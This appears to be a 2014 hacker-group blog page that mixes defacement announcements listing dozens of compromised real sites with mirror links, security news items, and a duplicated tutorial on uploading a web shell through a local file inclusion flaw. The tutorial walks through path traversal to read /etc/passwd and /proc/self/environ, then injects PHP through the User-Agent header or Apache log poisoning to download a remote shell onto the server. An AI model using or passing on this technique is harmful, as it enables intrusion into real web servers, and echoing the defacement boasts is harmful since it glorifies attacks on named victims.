WHMCS Hacked by b0x | WWW.MaDLeeTs.Com
Deface Url:
http://docs.whmcs.com/images/b0x.html
Zone-H:
http://zone-h.org/mirror/id/21518159
http://docs.whmcs.com/images/b0x.html
Zone-H:
http://zone-h.org/mirror/id/21518159
Friday, 24 January 2014
Thursday, 23 January 2014
Galcomm Israel Domain Registry Hacked By Team MadLeets.
GalComm Isreal Domain Registry Hacked By Team MaDLeetS
Deface links :
http://domain.galcomm.co.il/
http://idn.galcomm.co.il/
http://galcomm.org/index.htm
http://manager.galcomm.co.il/index.html
Mirror :http://www.zone-h.org/mirror/id/21630528
http://www.zone-h.org/mirror/id/21630527
http://www.zone-h.org/mirror/id/21630531
http://www.zone-h.org/mirror/id/21630532
Deface links :
http://domain.galcomm.co.il/
http://idn.galcomm.co.il/
http://galcomm.org/index.htm
http://manager.galcomm.co.il/index.html
Mirror :http://www.zone-h.org/mirror/id/21630528
http://www.zone-h.org/mirror/id/21630527
http://www.zone-h.org/mirror/id/21630531
http://www.zone-h.org/mirror/id/21630532
Justin Bieber arrested in Miami Beach for drunk driving..
Justin Bieber has had several run-ins with
police in recent years
Pop star Justin Bieber has been arrested in Florida accused of drunken driving and drag racing.
The Miami Beach Police Department said he was detained after racing on a street early on Thursday and had failed an alcohol test.
The 19-year-old has had several run-ins with police in recent years.
The arrest comes a week after his home in Los Angeles was searched by police following allegations he had thrown eggs at his neighbour's house.
He was accused of causing significant damage to the property. One member of his entourage was arrested for alleged drug possession following the search.
In the latest incident, the Associated Press quoted police as saying the singer had been driving a yellow Lamborghini when he was arrested in the early hours of Thursday.
The Miami Herald reported that members of the musician's entourage had apparently used their cars to block traffic on Pine Tree Drive at 26th Street, effectively creating a drag strip.
The driver of a second car, a red Ferrari, was also arrested and both cars impounded, said Miami Dade-Police spokesman Sgt Bobby Hernandez.
Police later named the other driver as an R&B singer known as Khalil.
The street where police say the singer was racing is a residential area in mid-Miami Beach.
Small apartment buildings are along one side of the street and on the other side are a high school, a youth centre, a golf course and a fire station.
In 2013, the Canadian singer was asked to remove graffiti he had left on the wall of a hotel in Australia. That came a month after he was charged in Brazil over a similar offence.
In 2012 he faced accusations of reckless driving, although prosecutors declined to press charges.
Justin Bieber lives in a gated community in Calabasas, about 30 miles north-west of central Los Angeles.
Researcher gets $33,500 for Remote Code Execution Vulnerability in Facebook..
Researcher gets $33,500 for Remote Code Execution Vulnerability in Facebook
Here comes a critical bug discovered in Facebook and biggest bounty ever paid by Facebook for reporting vulnerability in their website.
Reginaldo Silva, A Brazilian Hacker, has discovered a highly critical Remote Code Execution(RCE) vulnerability in the Facebook which could allowed attackers to read any files from the server. It could also allowed attackers to run malicious code in the server.
In September 2012, he first discovered XML External Entity Expansion bug in the Drupal that handled OpenID. OpenID is an open technology that allows users to authenticate to websites without having to create a new password.
He found similar bug affecting the Google's App Engine and Blogger. However, it is not critical as he wasn't able to access the arbitrary file or open network connections, he received $500 reward from Google.
He found out plenty of other websites implementing OpenID are vulnerable to RCE.
Recently, Silva learned that "facebook forgot password" page is also using OpenID provider to verify the identity of the user. He managed to discover the XXE bug in Facebook that allowed him to read the "etc/passwd" file from the server.
"Since I didn't want to cause the wrong impressions, I decided I would report the bug right away, ask for permission to try to escalate it to a RCE and then work on it while it was being fixed." Silva wrote in his blog.
He thought it will take time to fix the bug. However, the facebook security team responded quickly and fixed issue within 3.5 hours.
"I decided to tell the security team what I'd do to escalate my access and trust them to be honest when they tested to see if the attack I had in my mind worked or not. I'm glad I did that. After a few back and forth emails, the security team confirmed that my attack was sound and that I had indeed found a RCE affecting their servers." silva said.
He has been rewarded with a bounty of $33,500...
.
Wednesday, 22 January 2014
Notorious Hacker Guccifer Reportedly Arrested in Romania.. Cyber switch news
The man who brought us the George W. Bush paintings has reportedly been arrested: On Wednesday night, Romanian authorities arrested Marcel Lazăr Lehel, the 40-year-old man accused of being the hacker Guccifer, at his home in Arad. Guccifer has hacked into the email accounts of Colin Powell, family members and friends of at least three U.S. presidents, plus numerous other celebrities and officials.
According to Softpedia and various Romanian news sources, Romania's Directorate for Investigating Organized Crime and Terrorism (DIICOT) raided Lazăr Lehel's home last night. He was reportedly arrested shortly after.
This isn't the first time Lazăr Lehel has been arrested for hacking: In February 2012, he was convicted of dozens of hacking-related charges received a three year suspended sentence. Those charges stemmed from Lazăr Lehel's attacks on dozens of Romanian officials between October 2010 and July 2011.
Official PERL Blogs hacked, 2,924 Author Credentials Leaked by ICR - Cyber Switch News
Today the Islamic Cyber Resistance (ICR) has announced a breach on the official Perl blogs (http://blogs.perl.org)
The breach has seen 2,924 user account credentials published to quickleak.org as well as the blog having a deface page added but was not obtrusive to the actually website.
In the release note posted by the hackers they state the attack has been done to show support for the Syria Electronic Army.
Islamic Cyber Resistance Hacked Blogs.perl.org to Show Support Syrian People And SEAThey Are Fighting Every Day and Every Night With Terrorist and Al-QAEDA
The leaked data is from the authors of the blog of which 2,554 have full credentials and 2363 are non duplicated out of that. Full credentials included user names, email addresses, encrypted passwords, websites and API passwords as well as other site/server related information.
With the passwords being encrypted it does still not really leave much security to those who have been breached which include administrators and owners from other big well known services or websites.
At time of publishing it appears the admin are aware of the breach and the deface file has been removed
Security tips to Aviod Virus /Trojan/ Keylogger Infection..
Security tips to Aviod Virus /Trojan/ Keylogger Infection..
1. Install a good antivirus. Free or Paid is good, but dont used cracked or pirated versions.
2. Install real-time anti-spyware protection
3. Update your Anti-virus programs daily.
4. Perform scans on your computer daily.
5. Disable autorun to prevent infection from pendrives..
6. Disable image previews if usiing Outlook
7. Use good anti-virus which has browser plugins and scans all URL's for malacious content.
8. Use Hardware based Firewall.
9. Dont click on any mail links or attachments from unknown sources or malacious users.
10. Never download softwares from third-party sites. Download from original website. Dont use cracks or keygens which may be a virus/trojan itself..
2. Install real-time anti-spyware protection
3. Update your Anti-virus programs daily.
4. Perform scans on your computer daily.
5. Disable autorun to prevent infection from pendrives..
6. Disable image previews if usiing Outlook
7. Use good anti-virus which has browser plugins and scans all URL's for malacious content.
8. Use Hardware based Firewall.
9. Dont click on any mail links or attachments from unknown sources or malacious users.
10. Never download softwares from third-party sites. Download from original website. Dont use cracks or keygens which may be a virus/trojan itself..
Uploading Shell Via LFI Vul..
Today I Am Going To Teach You Two Ways Of Uploading Shell Via LFI Vul..
ReQuirement:- website vul to lfi.
MethoD 1:-
NOTE: You will need FireFox and its
addon Tamper Data to do this
method!
LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?
include=register.php
And now we are going to do this:-
http://www.target.com/index.php?
include=../
If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd
And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
And so on. Now let's say we got to this URL:-
http://www.target.com/index.php?
include=.../passwd
And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?
include=...environ
If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
PHP Code:-
<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
http://www.taget.com/shell.php
And rape the server.
Now LFI method 2:-
NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
telnet http://www.tagrget.com
80
When you are inside the telnet, you
copy the following code (you use your
own shell url:
PHP Code:
<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
http://www.taget.com/shell.php
ENJOY...
ReQuirement:- website vul to lfi.
MethoD 1:-
NOTE: You will need FireFox and its
addon Tamper Data to do this
method!
LFI or Local File Inclusion allows you
to include a local file(which means,
that the file is stored on the server)
and run it in a webscript.
In this method we are going to
upload a shell by accessing the proc/self/environ.
Now we have our page:-
http://www.target.com/index.php?
include=register.php
And now we are going to do this:-
http://www.target.com/index.php?
include=../
If it gives you an error message , this
is good. Best thing that can happen is, it says "No such file or directory".
But anyways, now add this to your url:-
http://www.target.com/index.php?
include=../etc/passwd
And as long as there is no text other
than an error message on the page,
keep adding "../" to the URL, so it would be like:
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
http://www.target.com/index.php?
include=.../passwd
And so on. Now let's say we got to this URL:-
http://www.target.com/index.php?
include=.../passwd
And we see some huge shitty text we
can not handle with. Now change the
etc/passwd in the URL to proc/self/environ so it would look like this:
http://www.target.com/index.php?
include=...environ
If you see some text, you did good, if
you see an error message you did
bad. Now this is the point where we
use Tamper Data. Start you Tamper
and reload the page, and for user
agent you type in the following PHP script:-
PHP Code:-
<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
This will execute the PHP script on
the site and create a shell.php on the
server. Why? Because the user agent
is being displayed on the webpage,
and if you put in a webscript for that, it will execute it.
Now simply access your shell by going to
http://www.taget.com/shell.php
And rape the server.
Now LFI method 2:-
NOTE: This only works on apache servers!
Alright you get back to the point
where we tried to access the etc/passwd. You will do the same method, but not with etc/passwd,
you will try to get access to apache/
logs/error.log
If you have a brain, you should know
how to do that, since it's EXACTLY
the same method as on etc/passwd
(explained in LFI method 1).
Now when you have found the file,
open up cmd and type in
Code:
telnet http://www.tagrget.com
80
When you are inside the telnet, you
copy the following code (you use your
own shell url:
PHP Code:
<?php $file = fopen
("shell.php" ,"w
+"); $stream = fopen ( "http://
www.website.com/
yourshell.txt" , "r" ); while(!
feof($stream )) {
$shell .= fgets
($stream ); } fwrite
($file , $shell ); fclose
($file );?>
Paste it into the telnet window, and
press enter once or maybe twice(until
you get an error message).
Now refresh the page in the browser
(error.log) once and there you go.
The PHP script will be executed and
your shell will get uploaded to the
server.
Access it by typing in the
following into your browser:-
http://www.taget.com/shell.php
ENJOY...
6 Official Domains of Ubuntu One Hacked and Defaced by Indonesian Gantengers Crew - Cyberswitch News
Ubuntu One which is a cloud service and OpenID-based single sign on service operated by Canonical Ltd, had 6 of its domains defaced few hours ago. SultanHaikal from Gantengers Crew contacted us and explained that reason for hacking Ubuntu One domains was to show the people that nothing is fully secured.
Sultan Haikal has left a deface page along with a message on all 6 hacked domains, according to which:-
Special Message: You say that you are a hacker, Defacer, but you are proud? it turns out that you are proud, you are a newbie WE ARE GANTENGERS CREW SultanHaikal – d3b~X – Brian Kamikaze – Coupdegrace – Mdn_newbie – Index Php...
This is not the first time when Ubuntu was hacked. Last year database of Ubuntu forum was hacked in which hackers had got access to usernames, passwords and email addresses of every registered user.
We have contacted Ubuntu PR desk in order to have an update from their side and article will be updated as soon as we get a reply back.
At the time of publishing this article, all 6 Ubuntu One domains were hacked and displaying deface page left by the hackers.
UPDATE: Ubuntu has replied to us, according to which:
- We’re currently investigating. In the meantime, on initial investigation, looks as though these people have simply uploaded a ‘defacement’ HTML file to the Ubuntu One file-sharing service. This would not be considered a ‘hack’, and is part of the normal operation of Ubuntu One. A file uploaded in this way does not pose a risk to Ubuntu One or its users.
Sunday, 19 January 2014
Hacked By Team MaXiMiZerS
http://whizwordeducation.com/index.php
http://myreforms.com/index.php
http://paydayloansdirectly.com/index.php
http://samedaycashloans.org.uk/index.php
http://quickmeal.co.in/index.php
http://starvivahpariwar.com/index.php
http://kvprakashan.in/index.php
http://uttaranchaltrip.com/index.php
http://texturepaintings.com/index.php
http://thankyoubands.com/index.php
http://bookmycab.co.in/index.php
http://smartphonetech.in/index.php
http://travelfactorindia.com/index.php
http://techazeek.com/index.php
http://appurvgupta.in/index.php
http://funnyengineer.in/index.php
http://divinejewellery.net/index.php
http://tourtoeurope.net/index.php
http://niftyadvice.com/index.php
http://indianpremierleagues.net/index.php
http://wisdomtreat.com/index.php
http://strimantra.com/index.php
http://wisdomtreat.com/index.php
http://green-chillies.com/index.php
http://trainings24x7.com/index.php
http://earthpharma.org/index.php
http://duainfratech.com/index.php
http://easypaydayloansusa.com/index.php
http://wedeliverz.com/index.php
http://heerapublicschool.com/index.php
http://taxifromdelhitoagra.in/index.php
http://funsep.com/index.php
http://cheappaydayloans.ws/index.php
http://ajaysawhneyandassociates.com/index.php
http://seventy9.in/index.php
http://designconsortia.com/index.php
http://smallbusinessforwoman.com/index.php
http://delhitoagrataxi.in/index.php
http://lifespacesinterior.com/index.php
http://delhiagrataxiservice.co.in/index.php
http://crosscountrytourism.com/index.php
http://mygroupshopping.com/index.php
http://pinnaclepropmart.com/index.php
http://srimaniram.com/index.php
http://punjwear.com/index.php
http://bridengroompariwar.com/index.php
http://usapersonalloans.net/index.php
http://delhitoagracab.co.in/index.php
http://normaklaboratories.co.in/index.php
http://hurrypaydayloan.com/index.php
http://getmepet.com/index.php
http://instantcashloans.org.uk/index.php
http://newbercoelectronics.com/index.php
http://viswabharthi.com/index.php
http://assetdrive.in/index.php
http://debashistexturedwallpaintings.com/index.php
http://earthmobiles.com/index.php
http://thankyouband.com/index.php
http://rahitravel.com/index.php
http://studioindesign.in/index.php
http://gift-shop-online.com/index.php
http://casiowatchesindia.com/index.php
./Mirror :-
http://zone-h.com/archive/notifier=MaXiMiZers
http://dark-h.org/hacker/?s=1&user=MaXiMiZers
./Team MaXiMiZers
NEPAL HEALTH FEDERATION stamped by "CyBER-71 hacker group
"Greets: BDXTOR, CODE-X-1337, 1337 AHMED, and CyBER-71 family"
==============================
SITE: http://www.nepalhpf.org/
MIRROR: http://www.zone-h.com/mirror/
==================================
Hacked By 3vil 3y3
Some search engine and high profile website stamped by 3vil 3y3
Shared torrents the biggest torrent website pawned!
http://sharedtorrents.com/1.htm
http://zone-h.com/mirror/id/21588374
world largest movie search engine stamped!
http://zshare-movies.com/delicieux/
http://zone-h.com/mirror/id/21588054
Popular Uk premium job website hacked by 3vil 3y3
http://actionevolution.co.uk/job/
http://zone-h.com/mirror/id/21587998
PDF search engine owned too..
http://searchsharedpdf.com/
http://zone-h.com/mirror/id/21588548
Subscribe to:
Posts (Atom)
Posts
